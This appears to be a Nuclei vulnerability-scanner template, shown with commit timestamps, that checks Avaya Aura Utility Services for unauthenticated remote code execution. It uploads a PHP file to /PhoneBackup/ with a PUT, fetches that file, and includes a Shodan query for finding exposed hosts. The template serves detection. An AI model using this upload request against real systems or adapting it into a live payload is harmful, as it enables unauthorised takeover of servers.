2023-02-03 18:14:11 +00:00
id : avaya-aura-rce
info :
name : Avaya Aura Utility Services Administration - Remote Code Execution
author : DhiyaneshDk
severity : critical
2023-06-16 04:43:11 +00:00
description : |
Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-02-03 18:14:11 +00:00
reference :
- https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/
- https://download.avaya.com/css/public/documents/101076366
2023-03-27 17:46:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cwe-id : CWE-94
2023-02-03 18:14:11 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2023-02-03 18:15:34 +00:00
shodan-query : html:"Avaya Aura"
2023-02-03 18:14:11 +00:00
tags : rce,avaya,aura,iot
2023-04-27 04:28:59 +00:00
http :
2023-02-03 18:14:11 +00:00
- raw :
- |
PUT /PhoneBackup/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
User-Agent : AVAYA
Connection : close
2023-06-16 04:44:46 +00:00
<?php print('avaya-aura-rce');unlink(__FILE__);
2023-02-03 18:14:11 +00:00
- |
GET /PhoneBackup/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
User-Agent : AVAYA
Connection : close
matchers-condition : and
matchers :
2023-06-19 12:26:23 +00:00
- type : dsl
dsl :
- "status_code_1 == 201"
- 'contains(body_2, "avaya-aura-rce")'
condition : and
